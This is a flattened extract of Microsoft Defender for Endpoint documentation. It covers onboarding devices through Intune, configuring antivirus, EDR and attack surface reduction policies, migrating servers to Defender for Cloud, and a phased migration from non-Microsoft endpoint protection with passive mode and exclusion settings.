Step 1: Onboard devices by creating a group in

Intune to assign configurations on
Identify target devices or users

In this section, we create a test group to assign your configurations on.
７ Note
Intune uses Microsoft Entra groups to manage devices and users. As an Intune
admin, you can set up groups to suit your organizational needs.
For more information, see Add groups to organize users and devices.
Create a group
1. Open the Microsoft Intune admin center.
2. Open Groups > New Group.
3. Enter details and create a new group.


4. Add your test user or device.
5. From the Groups > All groups pane, open your new group.
6. Select Members > Add members.
7. Find your test user or device and select it.


8. Your testing group now has a member to test.
Step 2: Create configuration policies to

configure Microsoft Defender for Endpoint
capabilities
In the following section, you create several configuration policies.
First is a configuration policy to select which groups of users or devices are onboarded
to Defender for Endpoint:
Then, you continue by creating several different types of endpoint security policies:

1. Open the Intune admin center.
2. Navigate to Endpoint security > Endpoint detection and response. Select on

Create Policy.

3. Under Platform, select Windows 10, Windows 11, and Windows Server, Profile -
Endpoint detection and response > Create.
4. Enter a name and description, then select Next.
5. Select settings as required, then select Next.


７ Note
In this instance, this has been auto populated as Defender for Endpoint has
already been integrated with Intune. For more information on the integration,
see Enable Microsoft Defender for Endpoint in Intune.
The following image is an example of what you'll see when Microsoft

Defender for Endpoint is NOT integrated with Intune:
6. Add scope tags if necessary, then select Next.


7. Add test group by clicking on Select groups to include and choose your group,
then select Next.
8. Review and accept, then select Create.


9. You can view your completed policy.
2. Navigate to Endpoint security > Antivirus > Create Policy.


3. Select Platform - Windows 10 and Later - Windows and Profile - Microsoft

Defender Antivirus > Create.
4. Enter name and description, then select Next.
5. In the Configuration settings page: Set the configurations you require for
Microsoft Defender Antivirus (Cloud Protection, Exclusions, Real-Time Protection,
and Remediation).

6. Add scope tags if necessary, then select Next.
7. Select groups to include, assign to your test group, then select Next.

8. Review and create, then select Create.
9. You see the configuration policy you created.
Attack Surface Reduction - Attack surface reduction rules

2. Navigate to Endpoint security > Attack surface reduction.
3. Select Create Policy.

4. Select Platform - Windows 10 and Later - Profile - Attack surface reduction rules
> Create.
6. In the Configuration settings page: Set the configurations you require for Attack
surface reduction rules, then select Next.
７ Note
We will be configuring all of the Attack surface reduction rules to Audit.

For more information, see Attack surface reduction rules.
7. Add Scope Tags as required, then select Next.
8. Select groups to include and assign to test group, then select Next.

9. Review the details, then select Create.
10. View the policy.


Attack Surface Reduction - Web Protection

2. Navigate to Endpoint security > Attack surface reduction.
4. Select Windows 10 and Later - Web protection > Create.


6. In the Configuration settings page: Set the configurations you require for Web
Protection, then select Next.
７ Note
We are configuring Web Protection to Block.
For more information, see Web Protection.
7. Add Scope Tags as required > Next.


8. Select Assign to test group > Next.
9. Select Review and Create > Create.


10. View the policy.
Validate configuration settings
Confirm policies have been applied

Once the Configuration policy has been assigned, it takes some time to apply.
For information on timing, see Intune configuration information.
To confirm that the configuration policy is applied to your test device, follow the
following process for each configuration policy.
1. Open the Intune admin center and navigate to the relevant policy as shown in the
preceding section. The following example shows the next generation protection
settings.

2. Select the Configuration Policy to view the policy status.
3. Select Device Status to see the status.
4. Select User Status to see the status.


5. Select Per-setting status to see the status.
 Tip
This view is very useful to identify any settings that conflict with another
policy.
Confirm endpoint detection and response

1. Before applying the configuration, the Defender for Endpoint Protection service
shouldn't be started.
2. After the configuration is applied, the Defender for Endpoint Protection service
should be started.

3. After the services are running on the device, the device appears in Microsoft
Defender portal.
Confirm next-generation protection

1. Before applying the policy on a test device, you should be able to manually
manage the settings as shown in the following image:

2. After the policy is applied, you shouldn't be able to manually manage the settings.
７ Note
In the following image Turn on cloud-delivered protection and Turn on real-

time protection are being shown as managed.
Confirm Attack Surface Reduction - Attack surface

reduction rules
1. Before applying the policy on a test device, open a PowerShell Window and type
Get-MpPreference .
2. You should see the following lines with no content:
AttackSurfaceReductionOnlyExclusions:
AttackSurfaceReductionRules_Actions:
AttackSurfaceReductionRules_Ids:

3. After applying the policy on a test device, open a PowerShell Windows and type
Get-MpPreference .
4. You should see the following lines with content, as shown in the following image:
Confirm Attack Surface Reduction - Web Protection

1. On the test device, open a PowerShell Windows and type (Get-
MpPreference).EnableNetworkProtection .
2. This should respond with a 0 as shown in the following image:
3. After applying the policy, open a PowerShell Windows and type (Get-
MpPreference).EnableNetworkProtection .
4. You should see a response with a 1 as shown in the following image:
 Tip
Feedback

Move to Microsoft Defender for
Endpoint
Article • 07/18/2023
Applies to:

Migration and setup guides

If you're considering moving to Defender for Endpoint, we have guidance to help. In the
following table, review the scenarios. Select the scenario that best represents your
situation, and see the recommended guidance.
ﾉ Expand table
Scenario Guidance
You don't have an endpoint protection solution in place yet, and Microsoft Defender for
you want to know more about Defender for Endpoint. You want Endpoint evaluation lab
to see how Defender for Endpoint works before rolling it out in
your environment.
You already have Defender for Endpoint, and you want some Microsoft Defender for
help getting everything set up and configured. Endpoint deployment guide
You're planning to switch from a non-Microsoft endpoint Make the switch to Microsoft
protection solution to Defender for Endpoint, which includes Defender for Endpoint
Microsoft Defender Antivirus. You want to get an overview of the
migration process and how to make the switch.
You've already migrated or onboarded to Defender for Endpoint. Configure general Defender
You want some help with next steps, such as managing your for Endpoint settings
security settings, configuring more features, or fine-tuning your
security policies.
You were previously using Microsoft Defender for Endpoint Migrating servers from
Server, and now you're moving your servers to Microsoft Microsoft Defender for
Defender for Cloud. Endpoint to Microsoft
Defender for Cloud
Do you have feedback for us?
Let us know what you think! Submit your feedback at the bottom of the page. We'll take
your feedback into account as we continue to improve and add to our migration
guidance.
See also
Microsoft Defender for Office 365
 Tip
Feedback

Migrating servers from Microsoft
Defender for Endpoint to Microsoft
Defender for Cloud
Article • 02/22/2024
Applies to:

This article guides you in migrating servers from Microsoft Defender for Endpoint to
Defender for Cloud.
Microsoft Defender for Endpoint is an enterprise endpoint security platform designed

to help enterprise networks prevent, detect, investigate, and respond to advanced
threats.
Microsoft Defender for Cloud is a solution for cloud security posture management
(CSPM) and cloud workload protection (CWP) that finds weak spots across your cloud
configuration. It also helps strengthen the overall security posture of your environment,
and can protect workloads across multicloud and hybrid environments from evolving
threats.
While both products offer server protection capabilities, Microsoft Defender for Cloud is
our primary solution to protect infrastructure resources, including servers.
How do I migrate my servers from Microsoft

Defender for Endpoint to Microsoft Defender
for Cloud?
If you have servers onboarded to Defender for Endpoint, the migration process varies
depending on machine type, but there's a set of shared prerequisites.
Microsoft Defender for Cloud is a subscription-based service in the Microsoft Azure

portal. Therefore, Defender for Cloud and the underlying plans like Microsoft Defender
for Servers Plan 2 need to be enabled on Azure subscriptions.
To enable Defender for Servers for Azure VMs and non-Azure machines connected
through Azure Arc-enabled servers, follow this guideline:
1. If you aren't already using Azure, plan your environment following the Azure Well-
Architected Framework.
2. Enable Microsoft Defender for Cloud on your subscription.
3. Enable a Microsoft Defender for Server plan on your subscription(s). In case you're
using Defender for Servers Plan 2, make sure to also enable it on the Log Analytics
workspace your machines are connected to; it enables you to use optional features
like File Integrity Monitoring, Adaptive Application Controls, and more.
4. Make sure the MDE integration is enabled on your subscription. If you have pre-
existing Azure subscriptions, you might see one (or both) of the two opt-in buttons
shown in the image below.
If you have any of these buttons in your environment, make sure to enable
integration for both. On new subscriptions, both options are enabled by default. In
this case, you don't see these buttons in your environment.
5. Make sure the connectivity requirements for Azure Arc are met. Microsoft
Defender for Cloud requires all on-premises and non-Azure machines to be
connected via the Azure Arc agent. In addition, Azure Arc doesn't support all MDE
supported operating systems. So, learn how to plan for Azure Arc deployments
here.
6. Recommended: If you want to see vulnerability findings in Defender for Cloud,

make sure to enable Microsoft Defender Vulnerability Management for Defender
for Cloud.

How do I migrate existing Azure VMs to
Microsoft Defender for Cloud?
For Azure VMs, no extra steps are required, these are automatically onboarded to
Microsoft Defender for Cloud, thanks to the native integration between the Azure
platform and Defender for Cloud.
How do I migrate on-premises machines to

Microsoft Defender for Servers?
Once all prerequisites are met, connect your on-premises machines via Azure Arc-
connected servers.
How do I migrate VMs from AWS or GCP

environments?
1. Create a new multicloud connector on your subscription. (For more information on
connector, see AWS accounts or GCP projects.
2. On your multicloud connector, enable Defender for Servers on AWS or GCP

connectors.
3. Enable autoprovisioning on the multicloud connector for the Azure Arc agent,
Microsoft Defender for Endpoint extension, Vulnerability Assessment and,
optionally, Log Analytics extension.
For more information, see Defender for Cloud's multicloud capabilities .

What happens once all migration steps are
completed?
After you complete the relevant migration steps, Microsoft Defender for Cloud deploys
the MDE.Windows or MDE.Linux extension to your Azure VMs and non-Azure machines
connected through Azure Arc (including VMs in AWS and GCP compute).
The extension acts as a management and deployment interface, which orchestrates and
wraps the MDE installation scripts inside the operating system and reflect its
provisioning state to the Azure management plane. The installation process recognizes
an existing Defender for Endpoint installation and connects it to Defender for Cloud by
automatically adding Defender for Endpoint service tags.
In case you have devices running Windows Server 2012 R2 or Windows Server 2016, and
those devices are provisioned with the legacy, Log Analytics-based Microsoft Defender
for Endpoint solution, Microsoft Defender for Cloud's deployment process deploys the
Defender for Endpoint unified solution. After successful deployment, it will stop and
disable the legacy Defender for Endpoint process on these machines.
 Tip
Feedback

Migrate to Microsoft Defender for
Endpoint from non-Microsoft endpoint
protection
Article • 10/24/2023
Applies to:

If you're ready to move from a non-Microsoft endpoint protection solution to Microsoft

Defender for Endpoint, or you're interested in what all is involved in the process, use this
article as a guide. This article describes the overall process of moving to Defender for
Endpoint Plan 1 or Plan 2. The following image depicts the migration process at a high
level:
When you migrate to Defender for Endpoint, you begin with your non-Microsoft
antivirus/antimalware protection in active mode. Then, you configure Microsoft
Defender Antivirus in passive mode, and configure Defender for Endpoint features.
Then, you onboard your organization's devices, and verify that everything is working
correctly. Finally, you remove the non-Microsoft solution from your devices.
The migration process
The process of migrating to Defender for Endpoint can be divided into three phases, as
described in the following table:
ﾉ Expand table
Phase Description
Prepare for your During the Prepare phase:

migration 1. Update your organization's devices.
2. Get Defender for Endpoint Plan 1 or Plan 2.
3. Plan roles and permissions for your security team, and grant them
access to the Microsoft Defender portal.
4. Configure your device proxy and internet settings to enable
communication between your organization's devices and Defender for
Endpoint.
5. Get baseline performance data for the devices that are onboarded to
Set up Defender for During the Setup phase:

Endpoint 1. Enable/reinstall Microsoft Defender Antivirus, and make sure it's in
passive mode on devices.
2. Configure your Defender for Endpoint Plan 1 or Plan 2 capabilities.
3. Add Defender for Endpoint to the exclusion list for your existing
solution.
4. Add your existing solution to the exclusion list for Microsoft Defender
Antivirus.
5. Set up your device groups, collections, and organizational units.
Onboard to During the Onboard phase:

Defender for 1. Onboard your devices to Defender for Endpoint.
Endpoint 2. Run a detection test to confirm that onboarding was successful.
3. Confirm that Microsoft Defender Antivirus is running in passive mode.
4. Get updates for Microsoft Defender Antivirus.
5. Uninstall your existing endpoint protection solution.
6. Make sure that Defender for Endpoint working correctly.
Next step
Proceed to Prepare for your migration.
 Tip
Feedback

Endpoint - Phase 1: Prepare
Article • 10/24/2023
Applies to:

ﾉ Expand table
Phase 1: Prepare Phase 2: Set up Phase 3: Onboard
You're here!
Welcome to the Prepare phase of migrating to Defender for Endpoint.
This migration phase includes the following steps:
1. Get and deploy updates across your organization's devices.

2. Get Microsoft Defender for Endpoint Plan 1 or Plan 2.
3. Grant access to the Microsoft Defender portal.
4. Review more information about device proxy and internet connectivity settings.
5. Capture performance baseline data from the endpoint
Step 1: Get and deploy updates across your

organization's devices
As a best practice, keep your organization's devices and endpoints up to date. Make
sure your existing endpoint protection and antivirus solution is up to date, and that your
organization's operating systems and apps also have the latest updates. Getting updates
installed now can help prevent problems later as you migrate to Defender for Endpoint
and employ Microsoft Defender Antivirus on all your devices.
Make sure your existing solution is up to date

Keep your existing endpoint protection solution up to date, and make sure that your
organization's devices have the latest security updates. Make sure to review your
solution provider's documentation for updates.
Make sure your organization's devices are up to date

Need help with updating your organization's devices? See the following resources:
ﾉ Expand table
OS Resource
Windows Microsoft Update
macOS How to update the software on your Mac
iOS Update your iPhone, iPad, or iPod touch
Android Check & update your Android version
Linux Linux 101: Updating Your System
Step 2: Get Microsoft Defender for Endpoint

Plan 1 or Plan 2
Now that you've updated your organization's devices, the next step is to get Defender
for Endpoint, assign licenses, and make sure the service is provisioned.
1. Buy or try Defender for Endpoint today. Start a free trial or request a quote .
Microsoft 365 E3 includes Defender for Endpoint Plan 1, and Microsoft 365 E5
includes Defender for Endpoint Plan 2.
2. Verify that your licenses are properly provisioned. Check your license state.
3. Set up your dedicated cloud instance of Defender for Endpoint. See Defender for
Endpoint setup: Tenant configuration.
4. If any devices in your organization use a proxy to access the internet, follow the
guidance in Defender for Endpoint setup: Network configuration.
At this point, you're ready to grant access to your security administrators and security
operators to use the Microsoft Defender portal .
Step 3: Grant access to the Microsoft Defender
portal
The Microsoft Defender portal is where you and your security team access and
configure features and capabilities of Defender for Endpoint. To learn more, see
Overview of the Microsoft Defender portal.
Permissions to the Microsoft Defender portal can be granted by using either basic
permissions or role-based access control (RBAC). We recommend using RBAC so that
you have more granular control over permissions.
1. Plan the roles and permissions for your security administrators and security
operators. See Role-based access control.
2. Set up and configure RBAC. We recommend using Intune to configure RBAC,

especially if your organization is using a combination of Windows, macOS, iOS,
and Android devices. See setting up RBAC using Intune.
If your organization requires a method other than Intune, choose one of the
following options:
Advanced Group Policy Management
Windows Admin Center
3. Grant your security team access to the Microsoft Defender portal. (Need help? See
Manage portal access using RBAC.
Step 4: View information about device proxy

and internet connectivity settings
To enable communication between your devices and Defender for Endpoint, you might
have to configure proxy and internet settings. The following table includes links to
resources you can use to configure your proxy and internet settings for various
operating systems:
ﾉ Expand table
Subscription Operating systems Resources
Defender for Windows 11 Configure and validate Microsoft Defender

Endpoint Plan 1 Windows 10 Antivirus network connections
Windows Server 2022
Subscription Operating systems Resources
Windows Server 2019

Windows Server 1803, or
later
Windows Server 2016*
Windows Server 2012
R2*
Defender for macOS (see System Defender for Endpoint on macOS: Network
Endpoint Plan 1 requirements) connections
Defender for Linux (see System Defender for Endpoint on Linux: Network
Defender for Windows 11 Configure machine proxy and internet

Endpoint Plan 2 Windows 10 connectivity settings
Windows Server 2022
Windows Server 2019
Windows Server 1803, or
later
Windows Server 2016*
Windows Server 2012
R2*
Defender for Windows Server 2008 R2 Configure proxy and internet connectivity
Endpoint Plan 2 SP1 settings
Windows 8.1
Windows 7 SP1
Defender for macOS (see System Defender for Endpoint on macOS: Network
* Windows Server 2016 and Windows Server 2012 R2 require installation of the modern,
unified solution for Windows Server 2012 R2 and 2016. For more information, see
Onboard Windows servers to Defender for Endpoint: Windows Server 2012 R2 and
Windows Server 2016.
） Important
The standalone versions of Defender for Endpoint Plan 1 and Plan 2 do not include
server licenses. To onboard servers, you'll need an additional license, such as either
Microsoft Defender for Servers Plan 1 or Plan 2. To learn more, see Defender for
Step 5: Capture performance baseline data
from the endpoint
When migrating from one antivirus product to Microsoft Defender Antivirus, your
organization's Help Desk's eyes are on what's new. Thus, if you already had an
application that was running hot (high cpu usage), their first troubleshooting step might
be to disable Microsoft Defender Antivirus. Before doing that, we highly recommend
capturing performance data from endpoints that have or will have Defender for
Endpoint installed.
Performance data should include the process list, CPU usage (aggregate across all
cores), memory usage, and disk space availability on all mounted partitions. This
information helps determine whether what you are seeing is normal or unexpected after
onboarding devices to Defender for Endpoint.
One of the tools that you can use is the Performance Monitor (perfmon). You can use it
to collect a performance baseline of your Windows or Windows Server endpoint. See
Setting a local perfmon in a Windows client or Windows Server.
Next step
Congratulations! You've completed the Prepare phase of switching to Defender for
Endpoint!
Proceed to set up Defender for Endpoint.
 Tip
Feedback

Endpoint - Phase 2: Setup
Article • 10/24/2023
Applies to:

ﾉ Expand table
You're here!
Welcome to the Setup phase of migrating to Defender for Endpoint. This phase
includes the following steps:
1. Reinstall/enable Microsoft Defender Antivirus on your endpoints.

2. Configure Defender for Endpoint Plan 1 or Plan 2
3. Add Defender for Endpoint to the exclusion list for your existing solution.
4. Add your existing solution to the exclusion list for Microsoft Defender Antivirus.
5. Set up your device groups, device collections, and organizational units.
Step 1: Reinstall/enable Microsoft Defender

Antivirus on your endpoints
On certain versions of Windows, Microsoft Defender Antivirus was likely uninstalled or
disabled when your non-Microsoft antivirus/antimalware solution was installed. When
endpoints running Windows are onboarded to Defender for Endpoint, Microsoft
Defender Antivirus can run in passive mode alongside a non-Microsoft antivirus
solution. To learn more, see Antivirus protection with Defender for Endpoint.
As you're making the switch to Defender for Endpoint, you might need to take certain
steps to reinstall or enable Microsoft Defender Antivirus. The following table describes
what to do on your Windows clients and servers.
ﾉ Expand table
Endpoint type What to do
Windows clients In general, you don't need to take any action for Windows clients (unless
(such as endpoints Microsoft Defender Antivirus has been uninstalled). In general, Microsoft
running Windows Defender Antivirus should still be installed, but is most likely disabled at
10 and Windows this point of the migration process.
11)
When a non-Microsoft antivirus/antimalware solution is installed and the
clients aren't yet onboarded to Defender for Endpoint, Microsoft Defender
Antivirus is disabled automatically. Later, when the client endpoints are
onboarded to Defender for Endpoint, if those endpoints are running a non-
Microsoft antivirus solution, Microsoft Defender Antivirus goes into passive
mode.
If the non-Microsoft antivirus solution is uninstalled, Microsoft Defender

Antivirus goes into active mode automatically.
Windows servers On Windows Server, you need to reinstall Microsoft Defender Antivirus, and
set it to passive mode manually. On Windows servers, when a non-
Microsoft antivirus/antimalware is installed, Microsoft Defender Antivirus
can't run alongside the non-Microsoft antivirus solution. In those cases,
Microsoft Defender Antivirus is disabled or uninstalled manually.
To reinstall or enable Microsoft Defender Antivirus on Windows Server,

perform the following tasks:
- Re-enable Defender Antivirus on Windows Server if it was disabled
- Re-enable Defender Antivirus on Windows Server if it was uninstalled
- Set Microsoft Defender Antivirus to passive mode on Windows Server
If you run into issues reinstalling or re-enabling Microsoft Defender

Antivirus on Windows Server, see Troubleshooting: Microsoft Defender
Antivirus is getting uninstalled on Windows Server.
 Tip
To learn more about Microsoft Defender Antivirus states with non-Microsoft

antivirus protection, see Microsoft Defender Antivirus compatibility.
Set Microsoft Defender Antivirus to passive mode on

Windows Server
 Tip
You can now run Microsoft Defender Antivirus in passive mode on Windows Server
2012 R2 and 2016. For more information, see Options to install Microsoft
1. Open Registry Editor, and then navigate to

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced
Threat Protection .
2. Edit (or create) a DWORD entry called ForceDefenderPassiveMode, and specify the
following settings:
Set the DWORD's value to 1.
Under Base, select Hexadecimal.
If Microsoft Defender Antivirus features and installation files were previously removed
from Windows Server 2016, follow the guidance in Configure a Windows Repair Source
to restore the feature installation files.
７ Note
After onboarding to Defender for Endpoint, you might have to set Microsoft
Defender Antivirus to passive mode on Windows Server. To validate that passive
mode was set as expected, search for Event 5007 in the Microsoft-Windows-
Windows Defender Operational log (located at C:\Windows\System32\winevt\Logs ),
and confirm that either the ForceDefenderPassiveMode or PassiveMode registry
keys were set to 0x1.
Are you using Windows Server 2012 R2 or Windows

Server 2016?
You can now run Microsoft Defender Antivirus in passive mode on Windows Server 2012
R2 and 2016 using the method described in the previous section. For more information,
see Options to install Microsoft Defender for Endpoint.
Step 2: Configure Defender for Endpoint Plan 1

or Plan 2
） Important
This article describes how to configure your Defender for Endpoint capabilities
before devices are onboarded.
If you have Defender for Endpoint Plan 1, complete steps 1-5 in the following
procedure.
If you have Defender for Endpoint Plan 2, complete steps 1-7 in the following
procedure.
1. Make sure Defender for Endpoint is provisioned. As a global admin, go to the

Microsoft Defender portal (https://security.microsoft.com ) and sign in. Then, in
the navigation pane, select Assets > Devices.
The following table shows what your screen might look like and what it means.
ﾉ Expand table
Screen What it means
Defender for Endpoint isn't

finished provisioning yet. You
might have to wait a little
while for the process to
finish.
Defender for Endpoint is

provisioned. In this case,
proceed to the next step.
2. Turn on tamper protection. We recommend turning tamper protection on for your

whole organization. You can do this task in the Microsoft Defender portal
(https://security.microsoft.com ).
a. In the Microsoft Defender portal, choose Settings > Endpoints.

b. Go to General > Advanced features, and then set the toggle for tamper
protection to On.
c. Select Save.
Learn more about tamper protection.
3. If you're going to use either Microsoft Intune or Microsoft Endpoint Configuration

Manager to onboard devices and configure device policies, set up integration with
Defender for Endpoint by following these steps:
a. In the Microsoft Intune admin center (https://endpoint.microsoft.com ), go to

Endpoint security.
b. Under Setup, choose Microsoft Defender for Endpoint.
c. Under Endpoint Security Profile Settings, set the toggle for Allow Microsoft
Defender for Endpoint to enforce Endpoint Security Configurations to On.
d. Near the top of the screen, select Save.
e. In the Microsoft Defender portal (https://security.microsoft.com ), choose

Settings > Endpoints.
f. Scroll down to Configuration management, and select Enforcement scope.
g. Set the toggle for Use MDE to enforce security configuration settings from
MEM to On, and then select the options for both Windows client and Windows
Server devices.
h. If you're planning to use Configuration Manager, set the toggle for Manage
Security settings using Configuration Manager to On. (If you need help with
this step, see Coexistence with Microsoft Endpoint Configuration Manager.)
i. Scroll down and select Save.
4. Configure your initial attack surface reduction capabilities. At a minimum, enable

the standard protection rules that are listed in the following table right away:
ﾉ Expand table
Standard Configuration methods

protection rules
Block credential Intune (Device configuration profiles or Endpoint Security policies)

stealing from the
Windows local Mobile Device Management (MDM) (Use the
Standard Configuration methods
protection rules
security authority ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionRules

subsystem configuration service provider (CSP) to individually enable and set the
(lsass.exe) mode for each rule.)
Block abuse of Group Policy or PowerShell (only if you're not using Intune,
exploited Configuration Manager, or another enterprise-level management
vulnerable platform)
signed drivers
Block persistence
through
Windows
Management
Instrumentation
(WMI) event
subscription
Learn more about attack surface reduction capabilities.
5. Configure your next-generation protection capabilities.
ﾉ Expand table
Capability Configuration methods
Intune 1. In the Intune admin center , select Devices > Configuration

profiles, and then select the profile type you want to configure. If you
haven't yet created a Device restrictions profile type, or if you want to
create a new one, see Configure device restriction settings in Microsoft
Intune.
2. Select Properties, and then select Configuration settings: Edit
3. Expand Microsoft Defender Antivirus.
4. Enable Cloud-delivered protection.
5. In the Prompt users before sample submission dropdown, select

Send all samples automatically.
6. In the Detect potentially unwanted applications dropdown, select

Enable or Audit.
7. Select Review + save, and then choose Save.
TIP: For more information about Intune device profiles, including how
Capability Configuration methods
to create and configure their settings, see What are Microsoft Intune
device profiles?.
Configuration See Create and deploy antimalware policies for Endpoint Protection in
Manager Configuration Manager.
When you create and configure your antimalware policies, make sure
to review the real-time protection settings and enable block at first
sight.
Advanced Group 1. Go to Computer configuration > Administrative templates >

Policy Windows components > Microsoft Defender Antivirus.
Management
or 2. Look for a policy called Turn off Microsoft Defender Antivirus.
Group Policy
Management 3. Choose Edit policy setting, and make sure that policy is disabled.
Console This action enables Microsoft Defender Antivirus. (You might see
Windows Defender Antivirus instead of Microsoft Defender Antivirus in
some versions of Windows.)
Control Panel in Follow the guidance here: Turn on Microsoft Defender Antivirus. (You
Windows might see Windows Defender Antivirus instead of Microsoft Defender
Antivirus in some versions of Windows.)
If you have Defender for Endpoint Plan 1, your initial setup and configuration is done
for now. If you have Defender for Endpoint Plan 2, continue to steps 6-7.
6. Configure your endpoint detection and response (EDR) policies in the Intune
admin center (https://endpoint.microsoft.com ). To get help with this task, see
Create EDR policies.
7. Configure your automated investigation and remediation capabilities in the

Microsoft Defender portal (https://security.microsoft.com ). To get help with this
task, see Configure automated investigation and remediation capabilities in
At this point, initial setup and configuration of Defender for Endpoint Plan 2 is
complete.
Step 3: Add Microsoft Defender for Endpoint to

the exclusion list for your existing solution
This step of the setup process involves adding Defender for Endpoint to the exclusion
list for your existing endpoint protection solution and any other security products your
organization is using. Make sure to refer to your solution provider's documentation to
add exclusions.
The specific exclusions to configure depend on which version of Windows your

endpoints or devices are running, and are listed in the following table.
ﾉ Expand table
OS Exclusions
Windows 11 C:\Program Files\Windows Defender Advanced Threat

Protection\MsSense.exe
Windows 10, version
1803 or later (See C:\Program Files\Windows Defender Advanced Threat
Windows 10 release Protection\SenseCncProxy.exe
information)
C:\Program Files\Windows Defender Advanced Threat
Windows 10, version Protection\SenseSampleUploader.exe
1703 or 1709 with
KB4493441 installed C:\Program Files\Windows Defender Advanced Threat
Protection\SenseIR.exe

Protection\SenseCM.exe

Protection\SenseNdr.exe

Protection\SenseSC.exe

Protection\Classification\SenseCE.exe
C:\ProgramData\Microsoft\Windows Defender Advanced Threat

Protection\DataCollection

Protection\SenseTVM.exe
Windows Server 2022 On Windows Server 2012 R2 and Windows Server 2016 running the
modern, unified solution, the following exclusions are required after
Windows Server 2019 updating the Sense EDR component using KB5005292 :
Windows Server 2016 C:\ProgramData\Microsoft\Windows Defender Advanced Threat

Protection\Platform\*\MsSense.exe
Windows Server 2012
R2 C:\ProgramData\Microsoft\Windows Defender Advanced Threat
OS Exclusions
Protection\Platform\*\SenseCnCProxy.exe
Windows Server,
version 1803 C:\ProgramData\Microsoft\Windows Defender Advanced Threat
Protection\Platform\*\SenseIR.exe

Protection\Platform\*\SenseCE.exe

Protection\Platform\*\SenseSampleUploader.exe

Protection\Platform\*\SenseCM.exe


Protection\Platform\*\SenseTVM.exe
Windows 8.1 C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service

State\Monitoring Host Temporary Files 6\45\MsSenseS.exe
Windows 7
NOTE: Monitoring Host Temporary Files 6\45 can be different numbered
Windows Server 2008 subfolders.
R2 SP1
C:\Program Files\Microsoft Monitoring
Agent\Agent\AgentControlPanel.exe
C:\Program Files\Microsoft Monitoring Agent\Agent\HealthService.exe
C:\Program Files\Microsoft Monitoring Agent\Agent\HSLockdown.exe

Agent\Agent\MOMPerfSnapshotHelper.exe

Agent\Agent\MonitoringHost.exe

Agent\Agent\TestCloudConnection.exe
） Important
As a best practice, keep your organization's devices and endpoints up to date.
Make sure to get the latest updates for Microsoft Defender for Endpoint and
Microsoft Defender Antivirus, and keep your organization's operating systems and
productivity apps up to date.
Step 4: Add your existing solution to the

exclusion list for Microsoft Defender Antivirus
During this step of the setup process, you add your existing solution to the list of
exclusions for Microsoft Defender Antivirus. You can choose from several methods to
add your exclusions to Microsoft Defender Antivirus, as listed in the following table:
ﾉ Expand table
Method What to do
Intune 1. Go to the Microsoft Intune admin center and sign in.
2. Select Devices > Configuration profiles, and then select the profile that you
want to configure.
3. Under Manage, select Properties.
4. Select Configuration settings: Edit.
5. Expand Microsoft Defender Antivirus, and then expand Microsoft

Defender Antivirus Exclusions.
6. Specify the files and folders, extensions, and processes to exclude from
Microsoft Defender Antivirus scans. For reference, see Microsoft Defender
7. Choose Review + save, and then choose Save.
Microsoft 1. Using the Configuration Manager console, go to Assets and Compliance >
Endpoint Endpoint Protection > Antimalware Policies, and then select the policy that
Configuration you want to modify.
Manager
2. Specify exclusion settings for files and folders, extensions, and processes to
exclude from Microsoft Defender Antivirus scans.
Group Policy 1. On your Group Policy management computer, open the Group Policy
Object Management Console , right-click the Group Policy Object you want to
configure and then select Edit.
Method What to do
2. In the Group Policy Management Editor, go to Computer configuration

and select Administrative templates.
3. Expand the tree to Windows components > Microsoft Defender Antivirus

> Exclusions. (You might see Windows Defender Antivirus instead of Microsoft
Defender Antivirus in some versions of Windows.)
4. Double-click the Path Exclusions setting and add the exclusions.
5. Set the option to Enabled.
6. Under the Options section, select Show....
7. Specify each folder on its own line under the Value name column. If you
specify a file, make sure to enter a fully qualified path to the file, including the
drive letter, folder path, filename, and extension. Enter 0 in the Value column.
8. Select OK.
9. Double-click the Extension Exclusions setting and add the exclusions.
10. Set the option to Enabled.
11. Under the Options section, select Show....
12. Enter each file extension on its own line under the Value name column.
Enter 0 in the Value column.
13. Select OK.
Local group 1. On the endpoint or device, open the Local Group Policy Editor.
policy object
2. Go to Computer Configuration > Administrative Templates > Windows
Components > Microsoft Defender Antivirus > Exclusions. (You might see
Windows Defender Antivirus instead of Microsoft Defender Antivirus in some
versions of Windows.)
3. Specify your path and process exclusions.
Registry key 1. Export the following registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
Defender\exclusions .
2. Import the registry key. Here are two examples:

- Local path: regedit.exe /s c:\temp\MDAV_Exclusion.reg
- Network share: regedit.exe /s \\FileServer\ShareName\MDAV_Exclusion.reg
Learn more about exclusions for Microsoft Defender for Endpoint and Microsoft
Defender Antivirus.
Keep the following points about exclusions in mind

When you add exclusions to Microsoft Defender Antivirus scans, you should add path
and process exclusions.
Path exclusions exclude specific files and whatever those files access.
Process exclusions exclude whatever a process touches, but doesn't exclude the
process itself.
List your process exclusions using their full path and not by their name only. (The
name-only method is less secure.)
If you list each executable (.exe) as both a path exclusion and a process exclusion,
the process and whatever it touches are excluded.
Step 5: Set up your device groups, device

collections, and organizational units
Device groups, device collections, and organizational units enable your security team to
manage and assign security policies efficiently and effectively. The following table
describes each of these groups and how to configure them. Your organization might not
use all three collection types.
７ Note
ﾉ Expand table
Device groups (formerly called 1. Go to the Microsoft Defender portal

machine groups) enable your security (https://security.microsoft.com ).
operations team to configure security
capabilities, such as automated 2. In the navigation pane on the left, choose Settings >
investigation and remediation. Endpoints > Permissions > Device groups.
Device groups are also useful for 3. Choose + Add device group.
assigning access to those devices so
that your security operations team 4. Specify a name and description for the device group.
can take remediation actions if
needed. 5. In the Automation level list, select an option. (We

recommend Full - remediate threats automatically.) To
Device groups are created while the learn more about the various automation levels, see How
attack was detected and stopped, threats are remediated.
alerts, such as an "initial access alert,"
were triggered and appeared in the 6. Specify conditions for a matching rule to determine
Microsoft Defender portal. which devices belong to the device group. For example,
you can choose a domain, OS versions, or even use
device tags.
7. On the User access tab, specify roles that should have

access to the devices that are included in the device
group.
8. Choose Done.
Device collections enable your Follow the steps in Create a collection.

security operations team to manage
applications, deploy compliance
settings, or install software updates
on the devices in your organization.
Device collections are created by

using Configuration Manager.
Organizational units enable you to Follow the steps in Create an Organizational Unit in a
logically group objects such as user Microsoft Entra Domain Services managed domain.
accounts, service accounts, or
computer accounts.
You can then assign administrators to

specific organizational units, and
apply group policy to enforce
targeted configuration settings.
Organizational units are defined in

Microsoft Entra Domain Services.
Next step
